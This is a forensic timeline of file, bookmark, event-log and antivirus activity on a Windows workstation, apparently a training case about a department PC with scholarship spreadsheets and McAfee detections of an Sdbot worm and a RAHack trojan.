Download - legend time activity name path/details
![Page 1: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/1.jpg)
legend
“bad” ids ids logs
“important” internet historyinternet history
mcafee stops something badwindows prefetch cache
files containing restricted data
file timestamps
“important” event logevent log
comments
time activity name path/details01/01/80 1:00:00 created hkcmd.exe C:\\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive01/01/80 1:00:00 created igfxtray.exe C:\\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive01/01/80 1:00:00 created smax4pnp.exe C:\\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive
10/05/01 8:20:28 written Ken.mbx C:\My Documents\Qualcomm\Eudora\Ken.mbx10/05/01 8:20:28 written Ken.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx10/29/01 7:02:04 written Misc.mbx C:\My Documents\Qualcomm\Eudora\Misc.mbx10/29/01 7:02:04 written Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx10/29/01 7:04:38 written Out.mbx C:\My Documents\Qualcomm\Eudora\Out.mbx10/29/01 7:04:38 written Out.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx
05/07/02 12:00:56 written foo.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls05/07/02 12:00:56 written boff claybon.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls
07/26/02 17:02:06 written UNWISE.EXE C:\\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive09/19/03 14:24:44 created agent.exe C:\\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive09/19/03 14:26:10 created issch.exe C:\\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive01/07/04 2:01:00 created sgtray.exe C:\\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive01/07/04 2:01:00 written sgtray.exe C:\\Program Files\Common Files\Sonic\Update Manager\sgtray.exe Windows Executable Code\Executable File, Archive01/07/04 15:56:57 created Credit Union of Ohio - Your Financial Resource Partner.urlhttp://www.cuofohio.org/ Bookmarks -04/13/04 7:07:18 written issch.exe C:\\Program Files\Common Files\InstallShield\UpdateService\issch.exe Windows Executable Code\Executable File, Archive04/17/04 13:41:30 written ISUSPM.exe C:\\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive04/23/04 20:03:06 written agent.exe C:\\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive08/04/04 3:06:34 created msmsgs.exe C:\\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created DRWATSON.EXE C:\\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive08/04/04 7:00:00 created MPNOTIFY.EXE C:\\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created accwiz.exe C:\\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created cmd.exe C:\\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created conf.exe C:\\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created ctfmon.exe C:\\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created defrag.exe C:\\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created dfrgntfs.exe C:\\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created dumprep.exe C:\\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created dwwin.exe C:\\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive08/04/04 7:00:00 created explorer.exe C:\\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created fxscover.exe C:\\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive08/04/04 7:00:00 created fxssvc.exe C:\\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created helpsvc.exe C:\\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created imapi.exe C:\\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created ipconfig.exe C:\\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created mshta.exe C:\\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created msimn.exe C:\\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created mstsc.exe C:\\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created netsh.exe C:\\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created ntbackup.exe C:\\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created ntvdm.exe C:\\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created regedit.exe C:\\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created rundll32.exe C:\\WINDOWS\SYSTEM32\rundll32.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created taskkill.exe C:\\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created tasklist.exe C:\\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created taskmgr.exe C:\\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive08/04/04 7:00:00 created unregmp2.exe C:\\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created userinit.exe C:\\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created wab.exe C:\\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created wmplayer.exe C:\\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 created wordpad.exe C:\\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive08/04/04 7:00:00 written DRWATSON.EXE C:\\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive08/04/04 7:00:00 written MPNOTIFY.EXE C:\\WINDOWS\SYSTEM32\MPNOTIFY.EXE Windows Executable Code\Executable File, Archive09/15/04 14:27:54 written unregmp2.exe C:\\WINDOWS\INF\unregmp2.exe Windows Executable Code\Executable File, Archive09/15/04 14:28:00 written wmplayer.exe C:\\Program Files\Windows Media Player\wmplayer.exe Windows Executable Code\Executable File, Archive10/12/04 18:54:30 written DVDLauncher.exe C:\\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File10/14/04 17:42:54 written smax4pnp.exe C:\\Program Files\Analog Devices\Core\smax4pnp.exe Windows Executable Code\Executable File, Archive11/04/04 14:03:44 created BRHS.ORG.url http://w3.brhs.org/ Bookmarks -01/27/05 8:05:47 created pagefile.sys Bookmarks -01/27/05 8:06:08 created A0061054.ini C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\A0061054.iniInitialization Windows File, Deleted, Overwritten, Archive, Compressed, Not Indexed01/27/05 8:10:43 created hiberfil.sys Bookmarks -01/27/05 8:10:43 created hiberfil.sys http://ubw.osu.edu/ubw_at_ohio.htm Bookmarks -01/27/05 8:10:43 created hiberfil.sys http://ubw.osu.edu/underwater_basket_weaving_facilit `ies_at_ohio.htm Bookmarks -01/27/05 8:10:43 created hiberfil.sys http://www.microsoft.com/isapi/redir .dll?prd=ie&ar=windowsm!a Bookmarks -01/27/05 8:10:43 created hiberfil.sys http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=hotmail Bookmarks -01/27/05 8:19:35 created DVDLauncher.exe C:\\Program Files\CyberLink\PowerDVD\DVDLauncher.exe Windows Executable Code\Executable File02/07/05 10:37:19 created _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed02/07/05 10:39:59 written _REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005C:\\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\Fifoed\snapshot\_REGISTRY_USER_USRCLASS_S-1-5-21-349397977-1612375313-4210125015-1005File, Deleted, Overwritten, Hidden, Archive, Compressed, Not Indexed02/07/05 10:40:41 logged SecEvent.Evt EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: OSUUBWCLASS DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: OSUUBWCLASS$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)-02/10/05 14:32:53 created accicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\accicons.exe Windows Executable Code\Executable File, Read Only, Archive02/10/05 14:32:53 created pptico.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\pptico.exe Windows Executable Code\Executable File, Read Only, Archive02/10/05 14:32:53 created wordicon.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe Windows Executable Code\Executable File, Read Only, Archive02/10/05 14:32:53 created xlicons.exe C:\\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe Windows Executable Code\Executable File, Read Only, Archive09/24/05 1:30:38 created acrotray.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive09/24/05 1:31:14 created acrodist.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive10/19/05 8:59:12 written hkcmd.exe C:\\WINDOWS\SYSTEM32\hkcmd.exe Windows Executable Code\Executable File, Archive10/19/05 8:59:14 written igfxtray.exe C:\\WINDOWS\SYSTEM32\igfxtray.exe Windows Executable Code\Executable File, Archive01/09/06 7:00:40 written SSLang.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File01/12/06 19:52:32 written acrotray.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrotray.exe Windows Executable Code\Executable File, Archive01/12/06 19:53:07 written acrodist.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive02/14/06 4:32:15 written SSMMgr.exe C:\\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive02/23/06 7:47:12 modified DRWATSON.EXE C:\\WINDOWS\SYSTEM32\DRWATSON.EXE Windows Executable Code\Executable Match File, Archive03/16/06 19:38:01 created verclsid.exe C:\\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File03/23/06 2:14:37 written Ssopen.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File03/23/06 8:54:52 written setup.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File04/07/06 15:02:24 written Weather.exe C:\\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive
![Page 2: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/2.jpg)
04/19/06 7:24:19 created VERCLSID.EXE-28F52AD2.pf C:\WINDOWS\Prefetch\VERCLSID.EXE-28F52AD2.pf04/27/06 15:07:38 written ubw042706ay07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls
04/27/06 15:07:38 written ogr-ubw042706ay07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls06/19/06 7:27:17 Deleted WFV6C.tmp C:\Documents and Settings\hackedpc.2\Local Settings\Temp\WFV6C.tmpW32/Sdbot.worm.gen.as (Virus)OUTLOOK.EXE06/19/06 7:27:25 Deleted WFV7D.tmp C:\Documents and Settings\hackedpc.2\Local Settings\Temp\WFV7D.tmpW32/Sdbot.worm.gen.as (Virus)OUTLOOK.EXE06/19/06 7:28:18 Deleted WFVA0.tmp C:\Documents and Settings\hackedpc.2\Local Settings\Temp\WFVA0.tmpW32/Sdbot.worm.gen.as (Virus)OUTLOOK.EXE10/04/06 9:04:20 written Eudora.exe C:\\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive10/26/06 14:40:34 created mdm.exe C:\\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive10/26/06 14:40:34 written mdm.exe C:\\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive11/07/06 15:39:18 written 37679041.pdf.zip C:\\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive11/07/06 15:39:18 written 37679041.pdf.zip C:\\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive11/07/06 15:39:18 written 37679041.pdf.zip C:\\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive01/09/07 12:56:21 created ISUSPM.exe C:\\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe Windows Executable Code\Executable File, Archive
01/17/07 7:17:00 written Mike.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx01/17/07 7:17:00 written Mike.mbx C:\Eudora\Mike.mbx01/17/07 7:17:00 written Mike.mbx C:\My Documents\Eudora\Mike.mbx
04/05/07 13:21:36 created AccessProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txtText Document File, Archive04/05/07 13:21:36 created BufferOverflowProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txtText Document Match File, Archive06/05/07 11:03:30 created SSSInstaller.dll C:\\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive06/05/07 11:03:30 created SSSInstaller.dll C:\\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive06/05/07 11:03:30 written SSSInstaller.dll C:\\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive06/05/07 11:03:30 written SSSInstaller.dll C:\\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive06/12/07 5:46:30 created SbTrayManager.exe C:\\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive06/12/07 5:46:30 written SbTrayManager.exe C:\\Program Files\SafeBoot Tray Manager\SbTrayManager.exe Windows Executable Code\Executable File, Archive06/22/07 10:55:27 created Joseph W. Testa, Franklin County Auditor - Welcome!.urlhttp://www.co.franklin.oh.us/auditor/ Bookmarks -07/23/07 15:37:20 written IFT 07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls
07/23/07 15:37:20 written IFT 07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls08/13/07 19:32:30 written mshta.exe C:\\WINDOWS\SYSTEM32\mshta.exe Windows Executable Code\Executable File, Archive
09/12/07 15:49:42 written Scholarship.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx09/12/07 15:49:42 written Scholarship.mbx C:\Eudora\Scholarship.mbx09/12/07 15:49:42 written Scholarship.mbx C:\My Documents\Eudora\Scholarship.mbx09/18/07 13:50:26 written Previous search.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx09/18/07 13:50:26 written Previous search.mbx C:\Eudora\Previous search.mbx09/18/07 13:50:26 written Previous search.mbx C:\My Documents\Eudora\Previous search.mbx09/18/07 13:50:26 written Previous search.mbx C:\Program Files\Qualcomm\Eudora\Previous search.mbx09/28/07 8:20:36 written Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx09/28/07 8:20:36 written Misc.mbx C:\Eudora\Misc.mbx09/28/07 8:20:36 written Misc.mbx C:\My Documents\Eudora\Misc.mbx10/01/07 8:39:24 written Out.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx10/01/07 8:39:24 written Out.mbx C:\Eudora\Out.mbx10/01/07 8:39:24 written Out.mbx C:\My Documents\Eudora\Out.mbx
10/01/07 9:48:40 created Eudora.exe C:\\Program Files\Qualcomm\Eudora\Eudora.exe Windows Executable Code\Executable File, Read Only, Archive10/01/07 10:52:52 created Out.mbx C:\Program Files\Qualcomm\Eudora\Out.mbx
10/01/07 11:06:24 created NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeWindows Executable Code\Executable Match File, Read Only, Archive10/01/07 11:06:24 created Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive10/01/07 11:06:24 created Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive10/01/07 11:06:24 created Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable File, Read Only, Archive10/01/07 11:06:24 created Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive10/01/07 11:06:24 written NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeWindows Executable Code\Executable Match File, Read Only, Archive10/01/07 11:06:24 written Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive10/01/07 11:06:24 written Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive10/01/07 11:06:24 written Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable File, Read Only, Archive10/01/07 11:06:24 written Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive
10/01/07 12:34:09 created Mike.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx10/01/07 12:34:09 modified Mike.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx10/01/07 12:34:09 modified Mike.mbx C:\My Documents\Eudora\Mike.mbx10/01/07 12:34:10 created Out.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx10/01/07 12:34:14 created Scholarship.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx10/01/07 12:34:14 modified Out.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx10/01/07 12:34:14 modified Out.mbx C:\My Documents\Eudora\Out.mbx10/01/07 12:34:15 created Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx10/01/07 12:34:15 modified Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx10/01/07 12:34:15 modified Misc.mbx C:\My Documents\Eudora\Misc.mbx10/01/07 12:34:15 modified Scholarship.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx10/01/07 12:34:15 modified Scholarship.mbx C:\My Documents\Eudora\Scholarship.mbx10/01/07 12:34:16 created Previous search.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx10/01/07 12:34:16 modified Previous search.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx10/01/07 12:34:16 modified Previous search.mbx C:\My Documents\Eudora\Previous search.mbx
10/01/07 12:35:04 created 37679041.pdf.zip C:\\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive10/01/07 12:35:04 modified 37679041.pdf.zip C:\\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive10/01/07 12:35:04 modified 37679041.pdf.zip C:\\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive10/01/07 12:37:08 accessed foo.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls10/01/07 12:37:08 created foo.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls10/01/07 12:37:08 modified foo.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\foo.xls
10/01/07 12:37:08 accessed boff claybon.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls10/01/07 12:37:08 created boff claybon.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls10/01/07 12:37:08 modified boff claybon.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2002 Scholarships\boff claybon.xls
10/01/07 12:37:12 created ubw042706ay07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls10/01/07 12:37:12 created IFT 07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls
10/01/07 12:37:12 created IFT 07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls10/01/07 12:37:12 created ogr-ubw042706ay07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls10/01/07 12:49:37 created Mike.mbx C:\Eudora\Mike.mbx10/01/07 12:49:38 modified Mike.mbx C:\Eudora\Mike.mbx10/01/07 12:49:39 created Out.mbx C:\Eudora\Out.mbx10/01/07 12:49:43 created Misc.mbx C:\Eudora\Misc.mbx10/01/07 12:49:43 created Scholarship.mbx C:\Eudora\Scholarship.mbx10/01/07 12:49:43 modified Out.mbx C:\Eudora\Out.mbx10/01/07 12:49:43 modified Scholarship.mbx C:\Eudora\Scholarship.mbx10/01/07 12:49:44 created Previous search.mbx C:\Eudora\Previous search.mbx10/01/07 12:49:44 modified Misc.mbx C:\Eudora\Misc.mbx10/01/07 12:49:44 modified Previous search.mbx C:\Eudora\Previous search.mbx10/01/07 12:49:44 modified Previous search.mbx C:\Program Files\Qualcomm\Eudora\Previous search.mbx
10/01/07 12:50:20 created 37679041.pdf.zip C:\\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive10/01/07 12:50:20 modified 37679041.pdf.zip C:\\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive
10/01/07 13:13:10 created Mike.mbx C:\Program Files\Qualcomm\Eudora\Mike.mbx10/01/07 13:13:10 created Misc.mbx C:\Program Files\Qualcomm\Eudora\Misc.mbx10/01/07 13:13:29 created Previous search.mbx C:\Program Files\Qualcomm\Eudora\Previous search.mbx10/01/07 13:13:30 created Scholarship.mbx C:\Program Files\Qualcomm\Eudora\Scholarship.mbx10/01/07 13:23:53 created Ken.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx10/01/07 13:23:53 modified Ken.mbx C:\My Documents\Qualcomm\Eudora\Ken.mbx10/01/07 13:23:53 modified Ken.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx10/01/07 13:23:54 created Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx10/01/07 13:23:54 created Out.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx10/01/07 13:23:54 modified Misc.mbx C:\My Documents\Qualcomm\Eudora\Misc.mbx10/01/07 13:23:54 modified Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx10/01/07 13:23:54 modified Out.mbx C:\My Documents\Qualcomm\Eudora\Out.mbx10/01/07 13:23:54 modified Out.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx
10/01/07 13:35:19 created UNWISE.EXE C:\\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive10/01/07 13:35:20 created Weather.exe C:\\Program Files\AWS\WeatherBug\Weather.exe Windows Executable Code\Executable File, Archive10/01/07 14:59:30 accessed Icon84031A18.exe C:\\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exeWindows Executable Code\Executable File, Read Only, Archive10/01/07 14:59:30 created Icon84031A18.exe C:\\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exeWindows Executable Code\Executable File, Read Only, Archive
![Page 3: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/3.jpg)
10/01/07 14:59:30 written Icon84031A18.exe C:\\Documents and Settings\smith.99999\Application Data\Microsoft\Installer\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}\Icon84031A18.exeWindows Executable Code\Executable File, Read Only, Archive10/01/07 16:26:26 accessed SSSInstaller.dll C:\\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive10/01/07 16:26:26 modified SSSInstaller.dll C:\\Program Files\Screensavers.com\SSSInstaller\bin\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive10/01/07 16:26:27 modified SSSInstaller.dll C:\\Documents and Settings\smith.99999\Local Settings\Temp\SSSInstaller.dll Dynamic Link Library Code\Library Match File, Archive10/24/07 13:05:19 Cleaned ohioamericanlegion[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\SZY7YXY1\ohioamericanlegion[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\iexplore.exe11/06/07 13:43:46 created Underwater Basket Weaving Majors and Minors 0708.xlsC:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls
11/06/07 13:43:46 created UBW Majors and Minors 0708.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls11/13/07 16:46:00 created TransferAgent.exe C:\\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive11/13/07 16:46:00 written TransferAgent.exe C:\\Documents and Settings\All Users\Application Data\Dell\TransferAgent\TransferAgent.exe Windows Executable Code\Executable File, Archive
